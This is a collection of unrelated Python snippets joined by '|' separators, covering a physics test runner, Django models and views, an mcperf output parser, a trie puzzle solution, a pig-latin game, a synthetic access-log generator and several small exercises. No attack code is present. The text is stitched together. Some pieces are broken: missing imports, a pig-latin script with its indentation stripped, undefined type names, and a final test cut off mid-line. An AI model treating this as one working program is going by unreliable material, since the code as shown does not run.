# Import the test helpers, falling back to an explicit sys.path entry when
# the script is run from another working directory. (The original had an
# unconditional `import dreamtests` BEFORE the try/except, which crashed
# before the fallback could run.)
try:
    import dreamtests
except ImportError:
    sys.path.append(str(pathlib.Path(__file__).parent.absolute()))
    import dreamtests

try:
    import DREAM
except ImportError:
    sys.path.append(str((pathlib.Path(__file__).parent / '..' / '..' / 'py').resolve().absolute()))
    import DREAM
# Import test modules
from code_conductivity import code_conductivity
from code_runaway import code_runaway
from code_synchrotron import code_synchrotron
from DREAM_avalanche import DREAM_avalanche
from numericmag import numericmag
from trapping_conductivity import trapping_conductivity
from ts_adaptive import ts_adaptive
# Names of all runnable physics tests; each corresponds to a module imported
# above whose run(args) entry point executes the test.
TESTS = [
    'code_conductivity',
    'code_runaway',
    'code_synchrotron',
    'DREAM_avalanche',
    'numericmag',
    'trapping_conductivity',
    'ts_adaptive'
]


def print_help():
    """Print command usage, the available options and the list of tests."""
    lines = [
        "Physics tests for DREAM\n",
        "Usage:",
        " runtests.py Show this help message.",
        " runtests.py all Run all tests.",
        " runtests.py [FLAGS] [test1 [test2 [...]]]",
        " Run the tests with names 'test1', 'test2' etc.\n",
        "Options:",
        " --plot Plot result instead of comparing automatically.",
        " --save Save test data to file.",
        " --verbose Print additional test info. \n",
        "Available tests:",
    ]
    lines.extend(" {}".format(name) for name in TESTS)
    for line in lines:
        print(line)
def runtest(name, args):
    """Run the named test.

    Prints a bold header, then dispatches to the module bound to `name` in
    this module's globals. Returns the test's result, or None when the name
    is unrecognized.
    """
    print("\x1B[1m:: {} \x1B[0m".format(name))
    if name in globals():
        return globals()[name].run(args)
    print("ERROR: Unrecognized test: '{}'".format(name))
    return None
def runall(args):
    """Run all available tests.

    Returns a truthy value only when every test in TESTS succeeded.
    """
    success = True
    for name in TESTS:
        success = runtest(name, args) and success
    return success
def main(argv):
    """Program entry point: parse arguments and dispatch the tests.

    Returns 0 when every requested test succeeds, 1 when no tests were
    requested (help is shown), and 255 on any failure.
    NOTE(review): `argv` is unused -- parse_args() reads sys.argv (this
    mirrors the original behavior).
    """
    parser = argparse.ArgumentParser(description='DREAM physics tests')
    parser.add_argument('--plot', help="In tests where applicable, plot results instead of comparing automatically", action="store_true")
    parser.add_argument('--save', help="In tests where applicable, save test data", action="store_true")
    parser.add_argument('--verbose', help="In tests where applicable, print additional information", action="store_true")
    parser.add_argument('tests', help="List of tests to run", type=str, nargs='*')
    args = parser.parse_args()

    arglist = {'plot': args.plot, 'save': args.save, 'verbose': args.verbose}
    requested = args.tests
    if not requested:
        print_help()
        return 1
    if len(requested) == 1 and requested[0].lower() == 'all':
        success = runall(arglist)
    else:
        success = True
        for name in requested:
            success = runtest(name, arglist) and success
    # Non-zero exit code on failure
    return 0 if success else 255
# Run the suite and propagate its exit code when invoked as a script.
if __name__ == '__main__':
    sys.exit(main(sys.argv[1:]))
|
def solution(arr):
    """Return the least common multiple of all the numbers in `arr`.

    The original scanned every integer between max(a, b) and a*b to find
    each pairwise LCM; lcm(a, b) = a*b // gcd(a, b) gives the same result
    directly.

    :param arr: non-empty list of positive integers
    :return: the LCM of the whole list
    """
    from math import gcd  # local import keeps this snippet self-contained

    answer = arr[0]
    for value in arr[1:]:
        answer = answer * value // gcd(answer, value)
    return answer
import unittest
import ctypes
from test.util import ClangTest
'''Test if pointers are correctly generated in structures for different target
architectures.
'''
class Pointer(ClangTest):
    """Check that generated pointer types follow the requested target arch."""

    #@unittest.skip('')
    def test_x32_pointer(self):
        """A pointer typedef must be 4 bytes on a 32-bit target."""
        flags = ['-target', 'i386-linux']
        self.convert('''typedef int* A;''', flags)
        self.assertEqual(ctypes.sizeof(self.namespace.A), 4)

    def test_x64_pointer(self):
        """A pointer typedef must be 8 bytes on a 64-bit target."""
        flags = ['-target', 'x86_64-linux']
        self.convert('''typedef int* A;''', flags)
        self.assertEqual(ctypes.sizeof(self.namespace.A), 8)

    @unittest.expectedFailure
    def test_member_pointer(self):
        """C++ pointer-to-member generation (not supported yet)."""
        flags = ['-target', 'x86_64-linux', '-x', 'c++']
        self.convert('''
        struct Blob {
            int i;
        };
        int Blob::*member_pointer;
        ''', flags)
        self.assertEqual(self.namespace.struct_Blob.i.size, 4)
        # FIXME
        self.fail('member pointer')
        #self.assertTrue(isinstance(self.namespace.member_pointer,POINTER_T) )

    def test_same_arch_pointer(self):
        """No POINTER_T fallback should be emitted when targeting the host."""
        self.convert('''
        typedef char* PCHAR;
        typedef void* PVOID;
        ''')
        # print(self.text_output)
        self.assertNotIn('POINTER_T', self.text_output)
        # self.assertIn('POINTER_T', self.text_output)

# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
# api/views.py
from django.http import HttpResponse
from rest_framework import status
from rest_framework import viewsets
from rest_framework import permissions
from rest_framework.views import APIView
from rest_framework.response import Response
import book.barcode as bc
#import from Django Project
from .serializers import UserSerializer, BookSerializer, CreateBookSerializer
from .models import Book, User
class CreateBookAPI(APIView):
    """Create a book from its ISBN, or bump the copy count if it exists."""

    # NOTE(review): attribute name kept as-is (misspelling of `queryset`);
    # APIView does not read it, so renaming is cosmetic but could surprise
    # external references.
    qureyset = Book.objects.all()
    serializer_class = CreateBookSerializer

    def post(self, request, format=None):
        """Register one copy of the book identified by request.data['isbn'].

        Returns 201 with the serialized data on success, 400 when the ISBN
        cannot be resolved by the barcode parser, and 200 with a placeholder
        body when the serializer input is invalid (original behavior kept).
        """
        serializer = CreateBookSerializer(data=request.data, partial=True)
        if not serializer.is_valid():
            print(serializer.errors)
            return Response({'key': 'value'}, status=status.HTTP_200_OK)

        isbn = request.data['isbn']
        if not Book.objects.filter(isbn=isbn):
            # New ISBN: look it up once (the original called bc.parsing twice).
            book = bc.parsing(isbn)
            if not book:
                return Response(serializer.data,
                                status=status.HTTP_400_BAD_REQUEST)
            serializer.save(isbn=isbn,
                            title=book['title'],
                            image=book['image'],
                            price=book['price'],
                            pubdate=book['pubdate'],
                            publisher=book['publisher'],
                            author=book['author'],
                            r_count=1,
                            count=1)
            return Response(serializer.data, status=status.HTTP_201_CREATED)

        # Known ISBN: just increment the number of copies.
        book = Book.objects.get(isbn=isbn)
        book.count = book.count + 1
        book.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
|
#!/usr/bin/python3
from BWCommon import *
from BWControl import *
import wx
import sys
import getopt
import os
import ctypes
import wx.py as py
# Short platform tag: 'win' on Windows, 'linux' otherwise.
osp = 'win' if sys.platform.startswith("win") else 'linux'
def main():
    """Create the local db directory if needed and run the wx GUI loop."""
    # Use os.F_OK explicitly: the bare F_OK relied on one of the star
    # imports above happening to provide it.
    if not os.access('db', os.F_OK):
        os.mkdir('db')
    app = wx.App(False)
    control = BWControl()  # keep the main controller alive during the loop
    app.MainLoop()

if __name__ == '__main__':
    main()
|
import re
from helper import *
def parseHostsFile(filename):
    """Parse a hosts file into server and client host lists.

    The file contains a 'Servers:' marker followed by one host per line,
    then a 'Clients:' marker followed by client hosts. Lines starting with
    '#' are comments.

    :param filename: path of the hosts file
    :return: tuple (servers, clients) of host-name lists
    """
    # Context manager closes the handle (the original leaked it).
    with open(filename) as f:
        lines = f.readlines()
    category = 0  # 0=none / 1=servers / 2=clients
    servers = []
    clients = []
    for line in lines:
        # Ignore comment lines
        if line.startswith('#'):
            continue
        line = line.strip()
        if not line:
            continue  # skip blank lines -- they are not host names
        if category == 0 and 'Servers:' in line:
            category = 1
        elif category == 1:
            if 'Clients:' in line:
                category = 2
            else:
                servers.append(line)
        elif category == 2:
            clients.append(line)
    return (servers, clients)
# Class for parsing mcperf output
#
# Extracts request/response rates, sizes and counts, plus the response-time
# histogram. (The previous header mistakenly described ethstats parsing.)
class McperfParser:
    def __init__(self, filename):
        """Read `filename` and parse its operation and latency statistics."""
        self.f = filename
        # Context manager closes the handle (the original leaked it).
        with open(filename) as fh:
            self.lines = fh.readlines()
        self.parse_ops_mcperf()
        self.parse_latency_mcperf()

    def parse_ops_mcperf(self):
        """Parse rates, sizes and request/response counts.

        Sets self.reqr/rspr/reqsize/rspsize/reqs/rsps (0 when a line is
        absent) and also returns them as a tuple.
        """
        pat_reqr = re.compile(r'Request rate: ([0-9\.]+) req/s')
        pat_rspr = re.compile(r'Response rate: ([0-9\.]+) rsp/s')
        pat_reqsize = re.compile(r'Request size \[B\]: avg ([0-9\.]+) min')
        pat_rspsize = re.compile(r'Response size \[B\]: avg ([0-9\.]+) min')
        pat_reqrsp = re.compile(r'Total: connections ([0-9\.]+) requests ([0-9\.]+) responses ([0-9\.]+) test-duration')
        self.reqr = 0     # request rate (req/s)
        self.rspr = 0     # response rate (rsp/s)
        self.reqsize = 0  # average request size (bytes)
        self.rspsize = 0  # average response size (bytes)
        self.reqs = 0     # number of requests
        self.rsps = 0     # number of responses
        for l in self.lines:
            # reqr
            m = pat_reqr.search(l)
            if m:
                self.reqr = float(m.group(1))
            # rspr
            m = pat_rspr.search(l)
            if m:
                self.rspr = float(m.group(1))
            # reqsize
            m = pat_reqsize.search(l)
            if m:
                self.reqsize = float(m.group(1))
            # rspsize
            m = pat_rspsize.search(l)
            if m:
                self.rspsize = float(m.group(1))
            # reqs, rsps
            m = pat_reqrsp.search(l)
            if m:
                self.reqs = int(m.group(2))
                self.rsps = int(m.group(3))
        return (self.reqr, self.rspr,
                self.reqsize, self.rspsize,
                self.reqs, self.rsps)

    def parse_latency_mcperf(self):
        """Parse the response-time histogram.

        Sets and returns self.hist: {bucket-lower-bound-in-us: count}.
        NOTE(review): number pairs are matched on every line, not only after
        the histogram header -- kept as the original behaved; safe as long
        as no other mcperf line contains "<number> <number>".
        """
        pat_mcperf = re.compile(r'([\d\.]+) (\d+)')
        hist = dict()
        skip = 0
        for l in self.lines:
            if skip == 0 and "Response time histogram [ms]" in l:
                skip = 1
                continue
            # Parse
            l = l.strip()
            if l == ":":
                continue
            if "Response time [ms]: p25" in l:
                break
            m = pat_mcperf.search(l)
            if m:
                lo, num = m.group(1), m.group(2)
                lo = float(lo)
                # Bucket key: lower bound converted from ms to microseconds.
                hist[int(lo * 1e3)] = int(num)
        self.hist = hist
        return hist

    def get_hist(self):
        """Return the parsed latency histogram dict."""
        return self.hist

    def get_reqr(self):
        """Return the request rate (req/s)."""
        return self.reqr

    def get_rspr(self):
        """Return the response rate (rsp/s)."""
        return self.rspr

    def get_reqsize(self):
        """Return the average request size in bytes."""
        return self.reqsize

    def get_rspsize(self):
        """Return the average response size in bytes."""
        return self.rspsize

    def get_reqs(self):
        """Return the total number of requests."""
        return self.reqs

    def get_rsps(self):
        """Return the total number of responses."""
        return self.rsps
|
def main():
    """Copy names from one file to another, upper-casing every line."""
    print("This program changes the names in a file to all capital letters")
    infile_name = input("What files are the names in? ")
    outfile_name = input("Place names in this file: ")
    # Context managers close both files (the original never closed them,
    # and reused the *Name variables for the file objects).
    with open(infile_name, "r") as infile, open(outfile_name, "w") as outfile:
        for line in infile:
            outfile.write(line.upper())

main()
|
def reverse(times):
    """Write one "Case #k: ..." output line with the input tokens reversed.

    Reads a line from the global input handle `a` and writes to the global
    output handle `b` (both opened in the __main__ block below).
    """
    tokens = a.readline().split()
    b.write("Case #{}: ".format(times + 1))
    for token in reversed(tokens):
        b.write("{} ".format(token))
    b.write("\n")
if __name__ == '__main__':
    # Open the Code Jam style input/output files; the first input line is
    # the number of test cases.
    a = open('in.txt', 'r')
    b = open('out.txt', 'w')
    # `xrange` only exists in Python 2; `range` behaves identically here
    # and also works on Python 3.
    for case in range(int(a.readline())):
        reverse(case)
    a.close()
    b.close()
import re
import unittest
from katas.kyu_5.mod4_regex import Mod
class Mod4RegexTestCase(unittest.TestCase):
    """ assertRegexpMatches doesn't seem to work properly for the tests
    since Mod.mod4 is a compiled regex object already, not just a string.
    To match the tests used on the Codewars kata, I used assertIsNone
    and assertIsNotNone for the tests instead. """

    def setUp(self):
        # Inputs the regex must reject / accept, consumed one per test.
        self.invalid_tests = iter([
            '[+05621]', '[-55622]', '[005623]', '[~24]', '[8.04]',
            "No, [2014] isn't a multiple of 4..."]
        )
        self.valid_tests = iter([
            '[+05620]', '[005624]', '[-05628]', '[005632]', '[555636]',
            '[+05640]', '[005600]', 'the beginning [-0] the end', '~[4]',
            '[32]', 'the beginning [0] ... [invalid] numb[3]rs ... the end',
            '...may be [+002016] will be.'
        ])

    def test_is_instance_1(self):
        """ According to this stackoverflow, the proper way to check that
        Mod.mod4 is a regex object is debatable. Here are two ways.
        https://stackoverflow.com/questions/6226180/detect-re-regexp-object-in-python
        """
        # Fixed: re._pattern_type was removed in Python 3.7. Comparing with
        # the type of a compiled pattern works on every version (and is
        # re.Pattern on 3.8+).
        self.assertIsInstance(Mod.mod4, type(re.compile('')))

    def test_is_none_1(self):
        self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))

    def test_is_none_2(self):
        self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))

    def test_is_none_3(self):
        self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))

    def test_is_none_4(self):
        self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))

    def test_is_none_5(self):
        self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))

    def test_is_none_6(self):
        self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))

    def test_is_not_none_1(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_2(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_3(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_4(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_5(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_6(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_7(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_8(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_9(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_10(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_11(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))

    def test_is_not_none_12(self):
        self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
|
#create feature based on WN Domain dataset
#WordNet Domain dataset; two datafile, one for WN1.6, one for WN2.0
#Snow didn't mention which one they use, but I use WN1.6, since I mapped 2.1 to 1.6
#Snow created two features, but I only created the first one, since I was not sure about
#the second one.
#- "wn-domains-2.0-20050210" contains the mapping between Princeton WordNet 1.6 synsets and their corresponding domains. The format is as above.

# NOTE(review): this snippet uses `pd` (pandas) but no import is visible in
# this chunk -- confirm `import pandas as pd` exists earlier in the file.
df_wn21wn16=pd.read_csv('WN21mapWn16_full.csv')
# Tab-separated mapping file: WN1.6 "offset-pos" -> domain label.
df_wn_domain=pd.read_csv('/Users/gary/Documents/2020Fall/IntroNLP/project/FeatureSpace/wn-domains-3.2/wn-domains-2.0-20050210',
                 sep='\t',header=None)
df_wn_domain.columns=['offset-pos','domain']
#filter offers that not in domain data
#wn16_offsets_lst = list(set(df_wn21wn16['offset1_wn16'].to_list()+df_wn21wn16['offset2_wn16'].to_list()))
#domain_offsets_lst=list(set(df_wn_domain['offset-pos'].to_list()))
#overlap_offsets_lst = list(set(wn16_offsets_lst)&set(domain_offsets_lst))

# For every synset pair: feature = 1 when both synsets map to exactly one
# domain each and those domains are equal, 0 when they differ. Rows where
# either synset has zero or multiple domains are left unset (NaN in the
# resulting column).
for i in range(len(df_wn21wn16)):
    offset1=df_wn21wn16.loc[df_wn21wn16.index[i],'offset1_wn16']
    offset2=df_wn21wn16.loc[df_wn21wn16.index[i],'offset2_wn16']
    dm1=df_wn_domain[df_wn_domain['offset-pos']==offset1]['domain'].to_list()
    dm2=df_wn_domain[df_wn_domain['offset-pos']==offset2]['domain'].to_list()
    if (len(dm1)==1 and len(dm2)==1):
        if dm1[0]==dm2[0]:
            feature=1
        else:
            feature=0
        df_wn21wn16.loc[df_wn21wn16.index[i],'wn_domain_feature']=feature
df_wn21wn16.to_csv('WN21mapWn16_WN_Domain_feature.csv',index=False)
|
def main():
print ("Pig latin game.")
print("")
name = raw_input('Pleae enter your name: ')
print 'Hello,', name, '! Welcome to pig latin game.'
print("")
vowels = ('a', 'e', 'i', 'o', 'u','A', 'E', 'I', 'O', 'U' )
with_vowels = "yay"
without_vowels = "ay"
end = "Q", "q", "Quit", "quit"
word = ""
while (word != end):
word = raw_input('Please type what you would like to translate into pig latin or type Quit or q to quit and press enter: ')
if len(word) > 0 and word.isalpha() and word[0] in vowels and word != end:
wordl = word.lower()
new_word = wordl + with_vowels
print(new_word)
elif len(word) > 0 and word.isalpha() and word[0] not in vowels and word != end:
wordl = word.lower()
new_word = wordl + wordl[0] + without_vowels
new_word = new_word[1:]
print(new_word)
else:
print "please enter a valid word/sentence"
print("Thanks for playing pig latin! Hopefully will see you again")
main()
|
class Node:
    """Single trie node keyed by one character."""

    def __init__(self, key):
        self.key = key
        self.child = dict()  # child character -> Node ('*' marks a word end)
        self.count_leaf = 0  # number of inserted words passing through here


class Trie:
    """Prefix trie answering suffix-wildcard queries such as 'fro??'."""

    def __init__(self):
        self.head = Node(None)
        self.word_count = 0  # total number of inserted words

    def insert(self, word):
        """Insert `word`, updating each node's pass-through count."""
        curr = self.head
        for c in word:
            if c not in curr.child:
                curr.child[c] = Node(c)
            curr = curr.child[c]
            curr.count_leaf += 1
        curr.child['*'] = True  # terminal marker
        self.word_count += 1

    def search(self, word):
        """Count inserted words matching `word` (trailing '?' are wildcards).

        Returns the number of words sharing the prefix before the first '?',
        0 when the literal prefix is absent, and 1 on a full literal match.
        """
        curr = self.head
        # Bug fix: the original initialized `marth_fail` (typo) but tested
        # `match_fail`, raising NameError for queries without any '?'.
        match_fail = False
        for c in word:
            if c != '?':
                if c not in curr.child:
                    match_fail = True
                    break  # literal prefix not present
                curr = curr.child[c]
            else:
                # Case 1: first '?' reached -- every word below matches.
                return curr.count_leaf
        if match_fail is True:
            return 0  # Case 2: no matching word
        return 1      # Case 3: literal match
def solution(words, queries):
    """For each query, count how many words it matches ('?' at one end)."""
    tries = dict()      # word length -> Trie of the words
    inv_tries = dict()  # word length -> Trie of the reversed words
    # Group words into one trie per length; the reversed-word trie lets
    # leading-wildcard queries be answered as trailing-wildcard searches.
    for word in words:
        length = len(word)
        if length not in tries:
            tries[length] = Trie()
            inv_tries[length] = Trie()
        tries[length].insert(word)
        inv_tries[length].insert(word[::-1])

    answer = list()
    for query in queries:
        length = len(query)
        if length not in tries:
            # Case 1: no word of this length exists.
            result = 0
        elif query.count('?') == length:
            # Case 2: all-wildcard query matches every word of this length.
            result = tries[length].word_count
        elif query[0] == '?':
            # Case 3: leading wildcards -- search the reversed trie.
            result = inv_tries[length].search(query[::-1])
        else:
            # Case 4: trailing wildcards.
            result = tries[length].search(query)
        answer.append(result)
    return answer
words = ["frodo", "front", "frost", "frozen", "frame", "kakao"]
queries = ["fro??", "????o", "fr???", "fro???", "pro?"]
print(solution(words, queries))
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import random
origin = [0, 0]  # the origin point [0, 0]


def create(pos=origin):
    """Return a closure that moves `pos` in place, printing each new position.

    NOTE(review): `pos` defaults to the module-level `origin` list, so every
    closure made by create() shares and mutates the same list -- this shared
    mutable default is the behavior the demo illustrates.
    """
    def move(direction, step):
        # new_x = pos[0] + direction[0]*step
        # new_y = pos[1] + direction[1]*step
        # pos = [new_x, new_y]  (rebinding `pos` like this would raise an error)
        pos[0] += direction[0] * step
        pos[1] += direction[1] * step
        print(pos)
        return pos
    return move


hu = create()
hu([0, 1], 10)
print('另一种实现方式!!!!!!!!!!!')
# That being the case, why not just use a class?!
# Note: the approach below is NOT a closure.
class Player(object):
    """A named player on a 2-D grid with a random start position."""

    def __init__(self, name):
        self.name = name
        # Random start position in [-20, 20] on each axis.
        self.pos = [random.randint(-20, 20), random.randint(-20, 20)]
        print('%s的初始坐标为[%d, %d]' % (self.name, self.pos[0], self.pos[1]))

    def move(self, direction, step):
        """Move `step` units in `direction` (1=up, 2=down, 3=left, 4=right).

        An invalid direction or a non-numeric step prints an error and
        leaves the position unchanged.
        """
        if direction not in (1, 2, 3, 4):
            print('错误!输入的方向必须在(1, 2, 3, 4)之中!')
        elif isinstance(step, (int, float)):
            # Each handler computes the target coordinates without touching
            # self.pos and returns (new_x, new_y, label).
            def up():
                return self.pos[0], self.pos[1] + step, '上'

            def down():
                return self.pos[0], self.pos[1] - step, '下'

            def left():
                return self.pos[0] - step, self.pos[1], '左'

            def right():
                return self.pos[0] + step, self.pos[1], '右'

            # BUG FIX (efficiency): the original built a dict of *results*
            # ({1: up(), ...}), calling all four handlers eagerly. Dispatch
            # on callables and invoke only the selected one.
            handlers = {1: up, 2: down, 3: left, 4: right}
            move_res = handlers[direction]()
            # Commit the computed coordinates back to the instance.
            self.pos[0] = move_res[0]
            self.pos[1] = move_res[1]
            print('%s向%s移动了%d步,移动后的坐标为[%d, %d]'
                  % (self.name, move_res[2], step, self.pos[0], self.pos[1]))
        else:
            print('错误!输入的步数必须为int或float!')
# Demo: random start position, then move up 10 and left 8.
test = Player('testname')
for demo_direction, demo_step in ((1, 10), (3, 8)):
    test.move(demo_direction, demo_step)
|
# models.py
from django.db import models
from django.conf import settings
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
    """post_save hook: create a DRF auth token for each newly created user.

    `instance` defaults to None (idiomatic object sentinel — the original
    used False); the signal always supplies it, so behavior is unchanged.
    """
    if created:
        Token.objects.create(user=instance)
class Board(models.Model):
    """A board posting: title, a content-type tag, and the content body."""
    title = models.CharField(max_length=30)
    content_type = models.CharField(max_length=20)
    content = models.TextField()
    write_date = models.DateTimeField(auto_now_add=True)  # set once at creation
class Knight(models.Model):
    """A knight card (help_text "카드번호" = card number)."""
    knightId = models.IntegerField(default=0, help_text="카드번호",unique=True)  # unique card number
    name = models.CharField(max_length=30)
    evlYn = models.CharField(max_length=1)  # one-char Y/N flag — presumably "evil yes/no"; TODO confirm
class SelectKnight(models.Model):
    """Associates a username with a selected knight card."""
    username = models.CharField(max_length=30)
    knightId = models.IntegerField(default=0, help_text="카드번호")  # card number
class User(models.Model):
    """Per-game participant state (distinct from Django's auth user)."""
    username = models.CharField(max_length=30,unique=True)
    joinYn = models.CharField(max_length=1)  # joined flag ('Y'/'N')
    readyYn = models.CharField(default='N',max_length=1)  # ready flag ('Y'/'N')
    hosuYn = models.CharField(default='N', max_length=1, help_text="호수의여신")  # help_text: "goddess of the lake" role flag
    assinKnightId = models.IntegerField(default=0, help_text="지정카드")  # assigned card id
class GameHistory(models.Model):
    """Per-user outcome record for one game round."""
    gameId = models.IntegerField(default=0, help_text="원정번호")  # expedition/game number
    username = models.CharField(default='N',max_length=30)
    succYn = models.CharField(default='N',max_length=1)  # success flag ('Y'/'N')
    winYn = models.CharField(default='N',max_length=1)  # win flag ('Y'/'N')
    knightId = models.IntegerField(default=0, help_text="지정카드")  # assigned card id
class Game(models.Model):
    """Overall state of one game."""
    gameId = models.IntegerField(default=0, help_text="원정번호")  # expedition/game number
    joinUserCnt = models.IntegerField(default=0, help_text="참여인수")  # number of joined users
    expeditionSeq = models.IntegerField(default=1, help_text="진행중회차")  # round currently in progress
    completeYn = models.CharField(default='N', max_length=1)  # game-finished flag ('Y'/'N')
class Expedition(models.Model):
    """One expedition round within a game."""
    gameId = models.IntegerField(default=0, help_text="원정번호")  # expedition/game number
    expeditionSeq = models.IntegerField(default=0, help_text="원정회차")  # round number
    expeditionUserCnt = models.IntegerField(default=0, help_text="원정참여유저")  # participants in the round
    # NOTE(review): help_text below duplicates the participants label even though
    # the field name says "success count" — looks like a copy-paste slip; confirm.
    succUserCnt = models.IntegerField(default=0, help_text="원정참여유저")
    succYn = models.CharField(default='N', max_length=1)  # round-succeeded flag ('Y'/'N')
    completeYn = models.CharField(default='N', max_length=1)  # round-finished flag ('Y'/'N')
    usernamelist = models.CharField(max_length=150)  # joined list of usernames — TODO confirm delimiter
class Election(models.Model):
    """A per-user Y/N record for one expedition round — presumably a vote; TODO confirm."""
    gameId = models.IntegerField(default=0, help_text="원정번호")  # expedition/game number
    expeditionSeq = models.IntegerField(default=0, help_text="원정회차")  # round number
    username = models.CharField(max_length=30)
    succYn = models.CharField(default='N', max_length=1)  # 'Y'/'N' flag
from functools import reduce
import operator
def max_product(lst, n_largest_elements):
    """Return the product of the `n_largest_elements` largest values in `lst`."""
    largest = sorted(lst, reverse=True)[:n_largest_elements]
    return reduce(operator.mul, largest)
'''
Introduction and Warm-up (Highly recommended)
Playing With Lists/Arrays Series
Task
Given an array/list [] of integers , Find the product of the k maximal numbers.
Notes
Array/list size is at least 3 .
Array/list's numbers Will be mixture of positives , negatives and zeros
Repetition of numbers in the array/list could occur.
Input >> Output Examples
maxProduct ({4, 3, 5}, 2) ==> return (20)
Explanation:
Since the size (k) equals 2, the subsequence of size 2 that gives the
maximal product is 5 * 4 = 20.
maxProduct ({8, 10 , 9, 7}, 3) ==> return (720)
Explanation:
Since the size (k) equals 3, the subsequence of size 3 that gives the
maximal product is 8 * 9 * 10 = 720.
maxProduct ({10, 8, 3, 2, 1, 4, 10}, 5) ==> return (9600)
Explanation:
Since the size (k) equals 5, the subsequence of size 5 that gives the
maximal product is 10 * 10 * 8 * 4 * 3 = 9600.
maxProduct ({-4, -27, -15, -6, -1}, 2) ==> return (4)
Explanation:
Since the size (k) equals 2, the subsequence of size 2 that gives the
maximal product is -4 * -1 = 4.
maxProduct ({10, 3, -1, -27} , 3) return (-30)
Explanation:
Since the size (k) equals 3, the subsequence of size 3 that gives the
maximal product is 10 * 3 * -1 = -30.
'''
|
class Solution:
    def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:
        """Merge two sorted linked lists; return the head of the merged list."""
        sentinel = ListNode(0)  # placeholder node; real head is sentinel.next
        tail = sentinel
        while list1 and list2:
            # Detach the smaller front node and append it to the merged tail.
            if list1.val < list2.val:
                tail.next, list1 = list1, list1.next
            else:
                tail.next, list2 = list2, list2.next
            tail = tail.next
        # At most one list is non-empty now; append whatever remains.
        tail.next = list1 or list2
        return sentinel.next
|
'''
Log generation simulation with different durations and rates.
'''
import os
import time
import random
from time import sleep
from datetime import datetime
import logging
# Module-wide logging: timestamped, level-tagged messages at INFO and above.
log_format = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(format=log_format, level=logging.INFO)
class LogGenerator:
    '''
    Simulation of a web-access-log generator.

    Args:
        file (str): Path of the log file to append generated entries to.
        rate (int): The average number of requests per second.

    Attributes:
        ips (list): Random ips to choose from.
        methods (list): Random methods to choose from.
        sections (list): Random sections to choose from.
        codes (list): Random codes to choose from.
    '''
    def __init__(self,
                 file="/tmp/access.log",
                 rate=20):
        self.file = file
        self.rate = rate
        # Duplicate entries bias random.choice toward the common values.
        self.ips = ["::1", "192.168.0.110", "127.0.0.1", "60.242.26.14"]
        self.methods = ["GET", "POST", "POST", "PUT", "DELETE"]
        self.sections = ["/img", "/captcha", "/css", "/foo", "/foo", "/bar"]
        self.codes = ["200", "200", "200", "200",
                      "200", "304", "403", "404", "501"]

    def write_log(self, timestamp):
        '''
        Write a log entry, given a timestamp.

        Args:
            timestamp (datetime): A timestamp for the random log.
        '''
        # BUG FIX: the original called open(self.file, 'a+', os.O_NONBLOCK),
        # passing an os.O_* flag as open()'s third positional argument, which
        # is `buffering` (a size), not an open flag. The explicit close() was
        # also redundant inside the `with` block.
        with open(self.file, 'a') as f:
            f.write(self.generate_log(timestamp))
            f.flush()

    def random_ip(self):
        '''
        Generate a random ip.

        Returns:
            (str): Generated random ip.
        '''
        return ".".join(str(random.randint(0, 255)) for _ in range(4))

    def generate_log(self, timestamp):
        '''
        Generate an access-log-style line for the given timestamp.

        Args:
            timestamp (datetime): A timestamp for the random log.

        Returns:
            (str): a random generated log entry, newline-terminated.
        '''
        # Either a known ip or a completely random one.
        ip = random.choice([random.choice(self.ips), self.random_ip()])
        method = random.choice(self.methods)
        section = random.choice(self.sections) \
            + random.choice([".html",
                             random.choice(self.sections) + '/',
                             random.choice(self.sections) + '/'])
        code = random.choice(self.codes)
        size = random.randint(10, 100000)
        return ('%s - - [%s +1000] "%s %s HTTP/1.1" %s %d\n'
                % (ip,
                   timestamp.strftime("%d/%b/%Y:%H:%M:%S"),
                   method,
                   section,
                   code,
                   size))

    def run(self, duration):
        '''
        Run the log generation.

        Args:
            duration (float): how long to keep generating, in seconds.
        '''
        start = time.time()
        while time.time() - start < duration:
            self.write_log(datetime.now())
            # Random spacing averaging 1/rate seconds between writes.
            sleep(random.random() * 2 / self.rate)
|
# -*- coding: utf-8 -*-
from app.models import Result, Season, Tournament
from app.tests import dbfixture, ResultData, TournamentData
from app.tests.models import ModelTestCase
from web import config
class TestResult(ModelTestCase):
    """Model tests for Result: fixture counts, season joins and scores."""

    def setUp(self):
        super(TestResult, self).setUp()
        # Load tournament + result fixtures for each test.
        self.data = dbfixture.data(TournamentData, ResultData)
        self.data.setup()

    def tearDown(self):
        self.data.teardown()

    def test_all(self):
        self.assertEqual(len(Result.all()), 10)

    def test_get(self):
        def results_for_season(season_id):
            # Join Result -> Tournament -> Season, filtered by season id.
            return (config.orm.query(Result)
                    .join(Result.tournament)
                    .join(Tournament.season)
                    .filter(Season.id == season_id)
